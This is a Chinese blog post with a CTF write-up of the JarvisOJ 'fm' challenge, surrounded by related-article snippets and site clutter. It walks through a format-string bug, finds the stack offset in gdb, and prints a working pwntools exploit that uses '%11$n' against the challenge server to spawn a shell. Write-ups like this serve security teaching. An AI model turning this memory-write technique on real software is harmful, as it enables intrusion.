JarvisOJ fm

最新推荐文章于 2023-07-11 21:10:41 发布
最新推荐文章于 2023-07-11 21:10:41 发布
阅读量1k 收藏 7
点赞数 5
文章标签: pwn 格式化字符串漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95220788
版权

这一题是一道格式化字符串漏洞题

关于格式化漏洞的基础,你可以看我前面的博客,里面有提到:https://blog.csdn.net/qq_43986365/article/details/94896862
拿到这一题,我们仍然是先查看保护:
在这里插入图片描述
我们可以看到,简单的格式化漏洞题只开了NX和CANARY保护,好的。
接下来我们就可以进入IDA中看一下程序的具体逻辑:
在这里插入图片描述
在这里,我们可以看到有一个明显的格式化字符串漏洞,利用%n的特殊性,我们可以把已经输出的字节个数打印到参数的任意位置(一个buf,他的赋值参数不一定是第一个)。
在这里我们只需要将x的值赋为4就可以拿到shell了。
让我们来看看这个buf的参数位置是哪个:
进入gdb,我们先下一个断点在格式化字符串漏洞之前:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在第一个printf()处下断点并且运行,输入多个a字符,接着查看参数:
在这里插入图片描述
x/16wx $esp的意思是以16进制查看esp处的参数,我们可以看到赋值参数在第11位(a的ACSII码的16进制是0x61)。
了解了这些之后,我们就能构造payload了。
完整的exp如下:

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9895)
x_addr=0x0804a02c
payload=p32(x_addr)+'%11$n'
p.sendline(payload)
print p.recv()
p.interactive()

运行结果如下:
在这里插入图片描述

PLpa、
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FM.zip_FM_FM matlab
09-23
FM的M文件,是基于MATALB环境下运行的
jarvisoj_fm
m0sway的博客
04-05 4087
jarvisoj_fm WriteUp BUU_PWN
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 183
BUUCTF 做题练习
jarvisosoj_fm
xieyichensss的博客
05-07 127
乍一看像是一个格式化字符串漏洞,但是这种漏洞我不太明白,于是昨天晚上恶补了一下,对%n有了更确切的了解。 思路:1.这题明显就是将x更改为4就可以获得shell,然后我查看到x的地址固定为0x804a02c,这个地址存放的数据为0x3。要让他变为0x4。 2.%n和%s一样,都要解析地址然后输出。%s是解析地址然后输出这个地址指向的内存数据,%n是解析地址,然后向次地址中填入之前打印字符的长度。(printf最后把格式化字符串的地址放入栈中,首先会把参数从右至左压入栈若没有参数,则会将栈上的内容作为参数输出
jarvisoj_fm【BUUCTF】
qq_41696518的博客
08-31 248
jarvisoj_fm【BUUCTF】
BUU刷题-Pwn-jarvisoj_fm
一个啥也不会的小菜鸡!
07-11 182
参数位置:从esp的下一个地址为第一个参数。格式化字符串漏洞,改变函数的值。%idx$n:修改某位置的内存。%numc:表示字符串长度。
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 197
checksec为常规保护,进入IDA分析main逻辑内部判断本题应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
[BUUCTF]PWN——jarvisoj_fm
BangSen1的博客
03-19 297
jarvisoj_fm 例行检查,开启NX和CANARY保护,32位。 运行程序 IDA载入,检索字符串,看见了“/bin/sh”字符串 跟进函数,当x=4的时候执行system(/bin/sh) 存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 payload=p32(x_addr)+"%11$n" 首先传入x参数的地址,这个地址存放在栈上偏移为11的位置,利用%11$n,定位到了偏移为11的位置,往这个位置写入数据,写
FM1188和FM1288
01-05
FM1188和FM1288完整资料,包括了Datasheet, 参考设计,程序员指南等等
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
FM模块_FM_
09-29
FM使用模块对于简易收音机是非常方便的,容易上手容易制作
FM1906驱动程序
09-18
段式LCD驱动器FM1906的驱动程序,包含初始化和LCD全显函数。FM1906 是 52 点、内存映象和多功能的 LCD 驱动器,FM1906 的软件配置特性使它适用于多种 LCD 应用场合,包括 LCD 模块和显示子系统。
FM.rar_FM
09-24
FM是角度调制其中之一,是载波的频率随调制信号做线性变化的过程,角度调制不再是调制信号频谱的搬移,而是频谱的非线性变换,因此又称作非线性调制。在调制过程中,通过调制信号的频率来控制载波频率的变化,载波的...
fm_fm调制_FM_仿真_
09-29
fm调制解调代码,链路级仿真,保证可用。
钢筋混凝土污水池及提升泵站施工方案.doc
05-03
课程设计污水处理
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
05-03
PHP基于Web的subversion用户管理系统(源代码+设计说明书).zip
node-v12.22.10-linux-armv7l.tar.xz
05-03
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
The Experiment 3 of Engineering Electromagnetics.pdf
最新发布
05-03
The Experiment 3 of Engineering Electromagnetics.pdf
fm1188和fm1288
07-26
FM1188和FM1288是两个不同的频率调制方法。 FM1188是一种广播频率调制方法,它使用1188 Hz的偏移频率来调制音频信号。在FM1188中,音频信号的幅度变化会导致发射信号的频率发生变化。由于频率的变化,接收器可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值